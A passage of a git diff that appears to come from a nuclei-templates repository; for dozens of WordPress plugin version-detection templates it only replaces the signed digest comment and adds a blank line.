body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bde68e85bd7c30ffe98aff680ae34308de55d5db8beb75355d4f5bdb4564c0b8022100d20eb0e8e7cd545061a175459e21ba725d8feb916ca972bc10a76827d00055d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d77e50c1653b3a0bc14febc94f6d962d085505c657e336d98a7e6722102066500220077441b5120e400d03bb6b9909a040b8b611f8b0d02d1715a6fde7731df9132b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index cc683f5dac..ccdfc5b071 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204349a05df3e7f65b3af551122b706ca766416e625926a3ba42ea05debdc71e96022100ad335a07cd6de93e2694d7c21aab3d53c8cc945dc59d0ca47c9bee9eeff89ca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206d0a491fafe51655a8dec567756a37dc6b79c689213b6992f6d2545eb264c25a022100fe657511ed28793051b6ec53e3916e43dbd403e0cf591bd7cb8b87f4ef7f0f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 1310eec841..b837ea23d0 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022048d502387a9663f0bf8a46fd6506aea738cfd106f4e7d7a65b70e4f61c7f981602207b970ccf181433422074f9b958ddf381aa3f2aaf68457e33581da1897992fc0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c92ac2368eb381fd9e2623f84b0cb0cb3a7b4b359227c9bc570fff6d6b15e61c022045051631c7ea3a80c71d77d48cc041342eb42f3f7e71af73cdd3c60cc85e6e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index f7e8f83480..53754c31c5 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220288f077cbdb1b44f581fdea0e63a6ac26168828ebc64780623830e3c64af87ef02200c4dcef7887b1784752d36ec4893658775bd0421cfdea98c45bd81fe1fec51b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bff69e4df97a1f90dc2dd75b81bd97ba9819228f3b51bbe7e17486888f22ff7902207864af6331dfdf09691016a3124fa43f23cd4fa6d4ce81553334b61ed8308052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 09ec3550f0..304e764668 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a00453043021f51196afaebcbcb09110f10cf7585bfc9168f374fc664bad391ae0c3174a995022047f462dfde8e2bb3e3de61c4d9c8e8d1a5b77799f20ff08ad3e59efc93521e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009a5756307b55484786e85851f7c0e749596dca07081b4fdf5d4de6bd2fd46a7802207d645ab183039773bdfe0684691189128b626a0658b59f13129f761bcd30f4e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 6040e35424..164b711adb 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c629ee14fefc2f840851838920ff54bdbfbda8b43e45980f3476ea357432949802207ea18b0c0c5f73f6d866521264b4c34f76b1d5bd91f532387b85503d69f32308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a77d79e5436477ea4ee5c9126054163494f0712bbe7652617ed5a767cde9088e02204daa48ea292795a9b7e469453cfd39d783fd2be67428e4a1b6f2d3f0b462a6a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 4e293eab93..626ac2ce95 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dbbb25141e1bc35c955818851a29f1e2f4375e51825e48f9a62aac9558698009022100d005fff49809ae47fbb5bfa9b3eaf803b19c51ae0a109aa8ec7745086ef4f430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ad175812900a32e5beaf33d343ebf85267a93fac26b2cfbfc3a7808270df5b37022100f642aaa961ea2ccdd8bbc65ebb9cbde431d1fb5e55c130f2111da57beea04f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 6faa30ec92..51a4af7376 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085ac950ee828f6f08076a1f2dce67594f72f51479e74048c39a307c6ac434e7c022100e2bf08f2967f7ed2ff48fe4657a2e242228463cadfe5916ab1a03106d3aa24e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200a7bfe0c792a1fa711bb77cf843ec4259a362e3404cdccc8148e4b42801043f2022100aa29066dd3366494c63441a6c47cdca7b0c41121ab4c94f8a50603357a4b20ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 4ed7bb898d..35de59e42d 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008d4d486532f5a89e11c7e5a54ed48ce99c24888215d43edbcf7d6131fdb713210221008c736ba7c6aecec22b9be1f4c8dad9c6b34625173e165e2ca3f6a38f558f6e2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fd07e51de32846017fe4fa8654d808f92f9502e7c3ad1ca54bbad094586ff470022016335749228019ac6d6aa958cab3872123e400a7542607203b085d3c16f82b77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index ae04eb8041..439c0c8e8b 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022033a19158f4bb5b334209edb8ec11f1ba4a5d022d9946d2451f6963a2f45f33e10220214eededd8855756b560b175960d129b903aadfa7f2e3b13b0ccc3c1aeb3ae24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022033c9f2374a8931d3611468dc86a39f517cad473c7d9be23453432b439e761114022100e3c87c3be5b4e3ec6c7e01e30eb0352e343fb6c85da2b82bcf4df97c2bc21420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 554a7ddc52..fc53faff3a 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220161ea92479b7b26d06161d1f1e63bdc395a947e63a88feced27c5d775639c1ae022100cb041d7bf4ba9f8138499145841e53cda5c867330fefba9b172109a823d1d641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 40a9342488..b8df4cc1b5 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a4031027da51eaa67589433d7a836c124819b52bd7ec5b03d2862906e618b2c02205bf4eb7cdee24f18b73b5353a3e3e74237938a5ee768cadefedf4c3d438b30b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205460b4e1650f81a1b09a413e59fe514d3dcb3666e31709b357dd36ef52d93c2d022100b92a6c19139ac7eb33418b22a5f6286cb8638466328088f2c0428ee214820a7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 1a923f077c..88434602b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b970424ff104294ea94e86a2af1bac0b483531d7d4adc0bb6ee2fb7919a2658f022054f0695f7c4ca56725bfe0174d8d902f45e178fc10f523ef808f63c5d87fc35e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022025a6c5ddd2ba8f46e70875a50fe019101bd573e8d03abade27f9bf5865c6470602200e9ee2ca967fd212c9b241f232711699a7ca88df70b0766f61c4d8090819edb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 963645770b..dd8d70c137 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e3472cb3cefbb40ce860483aea020b3f61683885f32de88f1f56cae385dcf52402203942cd0feb8997c829e7c6f860d2d8e8ef21472c06cd16e40e1f2b47cbf78748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022062e63448b7b680b4e310b75f7fd0d8dc4b6f740b48fc151b639d102fa5ca7e8602203c253ddca8024211e52375f3cd9621476c4c2863fb3b432c421c05ded9aafcb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 269a277f7c..6cb5f30285 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e7d9329e6fe8ab5a005e2d856347493832672dc6ce55e19e6700860a74f854e7022100f6d984255b95ae654fca081f1c04b5500c7ff8a0fefd9d85fba67c4f7f3ab963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204599becf19ff6620b3e96176854da79058b22765cc5135024e628c2044496414022100f24be3e4ec26e80675363ba5f1beaad865af02ae75f37e982a014150bc49ab97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 86190c7f25..848cca2101 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ebbc88b088552d90a18ff033bde1c20d14a66d5598d52926962d1e82af6167f8022100aea7f05f296d6e40c93a1ceb258fe9535dadadd11ef4bccb709fe8fadca42a1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206390dd3151209f44de9c7fdd1a19918866100f1d0bcb36177802c96eb30f5b2c022100a15e9e8f29d99fbddf41caecc806b6d9686325238ad4d429d04d53bd47652ffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index ebe622560e..88d26929bd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201897a8e11311c6878c24cfac649dd2ce906095fe4e90854f4b8c625fba29ef90022043334cd0b005a61ed9e47f83857147c33fb2aef4cddbee0f2402d407b16e18fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d86153cdc5e708476c82761839e05494f49a241d86f714c315441ccefed304990220125283acf57ebad9a92619ab8d78af44ae6eb39e2fb8ffb4f55312e241a5bbf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 0e81405824..fbf1894c36 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210090e930e7930e387c9cc4592e9a0d66e947b622bcd21a66dd91b994540bb17155022100a38df14764ca3b251a41a7e8257a83b621a034805d7690dba5b3f1452c58f804:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220308080fedcdbdb7a3ce030a57e269d7afee11670a2b44467be943a14b1c6b62802207f5be0c853e8f47785292ed90a4134cc281bc1d720ada2eeb22348accbd25165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 16be9a92a7..f193e85218 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205673e6337ba9a57e4f0215d73b2b6f9147f78226fd1423ffdb4be8d8b740e93c0221008126f5fed53b5c401622f3a75283988a8e7c40548296440f6a153082036d45ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210089944c4ecba9c5d85568bd725ab4676c0e812f2594d23624b8a168dbb53dc53202205498bd7bfe1bdae17c0c2657764e9f6536873171b139d4af2c7708c441c46c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index e163fb6eb0..d94f476540 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087c8905f0ee24e1ce86002579a680f8eea02c1d3ae48de1f647a0012a9580cd302205bd1670dc8d85ab1ec6558816b7e0081a14946acf7971df4278034411bf498b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220785cc01b2622b99180fc238c05145df0c80f2edb357dba7bf45872854fa9445d0220037ce4914a20ec0a44a2e32c60d294c181738c9a3e9d35a02e4ab09616a0fa68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index ec0bde5001..56d1d418ad 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202cbcdb82b1fe6a2180dbff0f33bec17ee74556e90189729f50af92ed9e479013022100b60033059d68364bda5ff3cc77c91d2d733d83ba647df760d492038b3b85793d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220478732e6e1401f5c30bb4568c007c1680ce65c7c784f107f7622ca1ee88d942302200b6487493fc2368d3f43be83a2b7c9eefe802d0c6338ef62ad33c21ee2d6b540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 56ddd12772..1ce0553644 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203eb0037d9964a84d6ef343e5bddff89b6aba70a3de6c24ad4257c6c25060eab4022100f89c80027eed31d96348fb9022d82779f435ee1df452fe41de1ddd52c7f5a228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008207fc8ba6cf0c2a41fcc17d793eb72791daead233324928d875a295ea093be302201ed17bbc8f705bfc4edd5d83398d4ffbfc0c5c8a20c3e94637067b1433fba5c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7c1e7291fc..89d3d55186 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202627b620b9661612c52693307ce612ec6a3f573e01030300e4f5a084ce33dd440221008bf230ab8ec0721dacf0964da556aca70a801204061a112f95e4f3d91d115def:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207a5505a19db76e3e345a06640b149105254dde4ed865effd00b41c79d2eb1eb5022100d051a4c2fb793e4ebaa2ea78c9c6297e0b6b953b38e5d4af295854717bfcfded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index c4d4ed6138..507ee095f5 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d1e3b34ec6c194860e2c8f046a7de29d749acd45837e4cf26e9bb4effc24e3b022100967c2af85f39f75d1714aa2677097c5d2f22398df5f43b4ae8d77a05807737d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202a7b943b8677893959bf56f7f5122b55165de04066740dba2849b6ae42049535022100ff03d0c6d958f80bd473d35ca1b54f5492a5ffa973330d58d769e081fc6f5556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index c130e126f8..df73c57605 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d3747d2725c11bf365f046c43424df25c71f859258395b769272f483b175128022100ae202c8a4d31148a293bb7a06b9280ba147db13f7af22eba224ceb0fe93bb533:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204b9a504fc54df73c6eb690bf1db6039c792a88a75c4b89df4fdc33c893d45e5d022100f04223c906ac6cbc0a8aac9adee9876b6017d25c2408cc0fc1f43f51f9f89cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 6dcaa29cbd..5c67a8091e 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e549e0f3b9f98ae60638c0f180c83f919922f763db97162e7bfeeb5301290e4022100da53e262118858cf1e3738d82a77bdf0175c7a2bf45640fa8ec4d56c1daba625:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205a1bddd770c47325d91abc938df1c549f0e0114f4c9c8ab554fcca5dc57700130220789db42f68aa0ecdeb02d4c28e5abbb3e86a3c019a4004aede1f3c7ebe25a73c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 28ff7cb296..9b93cd2342 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071627b253e6f954a23bd1eeb0d93f1b336851c724b52746d91d5ca00cf045915022100b4fb931f688003c4505e996dd4dc22db7e5da2892804f1e401c1c56adaca7594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bacb5358b88e39c2f654c12486bc5613d10acba3609033a65087f97ec2fe005f0220415e90ea09f8cbf41f5b3dfac5b42d9d9511ae5557f6a7c1cf79731523caa490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index c86216e8ee..619d1448bc 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2516886eb578c3d978daff7803bf855879c453cbb876eae97716664e097f5f8022100d65fe6802e3711ff3a6c33798fa7842d3f4702496f8bb7df6034d97df611e1bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100aa93d78c01762d128385305fa37eb61cdad66d3f2e75b7c1540c1c954fd1b1330220105737751340c3010c5e0abeecf846737d5336c2645db95a9e63f95b9aa3467f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 364140b630..715a2beca0 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207801ab74ba2b2f7149c7c49a9eb6482a0bc03948257dd0039d7016b5939ff6e0022012d035fa92552038aef0a4693c967eae5e32dd900a060cb2b3cfe039996b26cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100db9b0ab696ff38856b8e29d5be3246053225e8fc28599db3b061ec63b9389e13022100e8bb8e56a7b64a75931052b1c21f173409898a830aa0fc6d4eb9ebc2a6b86dc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 5440b57cf4..4f6959ad58 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a74a4d4d63db414ccbd046b52e3b25634d73a6e523a889e91033d2816dd3f0702206eba2791bb225376686b7fe2d0a91fc5c04020a3492b9b28ee38cd3d5f2fbc0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cf1ef255819a9d48276d6aa1477e74991dcf8faaf67e607ee56f01d1e7f27cce022100eb1566efbf0f16ea7c099a81c6e1612db8d16dab9a50d35e39adeccaa5442668:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index b3c40e44f1..c6dcd05c31 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a6fd8aad6a94bfffbae41f28a0d7a01a297a5366fd7b87aa7beec8defbf6d0d202210096e86526ecab654a24832ee2b8cd189c82585c843f343fd904df3a5a778056ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e1ff777f79a57760edf4f5cd594f49795d8768a3def2667314096dc6b6e11e8c022077e590346fb2ccfa76b2a5b3dd981f6521ba76baaa2194e0193045c5e1d1ab11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 81fad17158..f94b1c5f8c 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e374976b27d39b4baa8a7763c136fc6041ac5c0e3095a81e419ff46735f11fbb022100fb35a22f36ab7559f9b7d62cccf4bf6b384552d34c16699b5710b8a87e06abca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220122420cb80ae36ffa86958ed9d15246bf810f9d29ef91a8b6465674a23c1a5b30221009bae609144384cda26f2b26511a18087793b256e169f02bf45e0494a84261a38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 91f60d796b..5203270ee1 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022046bb96eea9153cb430a7a50001c51e8bc3a8f1384f0fb2068e70cb99bcd3062002202cf8601179c149f313932a643d4ab97834dcfc1d939235a3d3c158f83ed92eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b13a952ea4a56ea3fcd1d44c89d14fc8b2c05d2a62d810a3facc0332f07e507b0220743c6ea21a0f841cd845a9824993970fe167d29e608e59c12e3e95c017c50766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 0434268214..b8452aad91 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220297ff26265f6636c566562ddf989394441153ba6e5b5eda15aeb1c9e645cbbaf022100977b9c4f3d78f634a80ebb4d1ed0f0f00c9a44630daf83a03806a8b7e2abf8c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022053fe7731ee1f6191593e4f5e86bbf14f7ad53573abe363d4cbb59f230b728868022022d4463f7e986fc638c010fb294618e63e3defe4d77309007a5adf8c33b887cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index fc3b8049e7..e92eab24d0 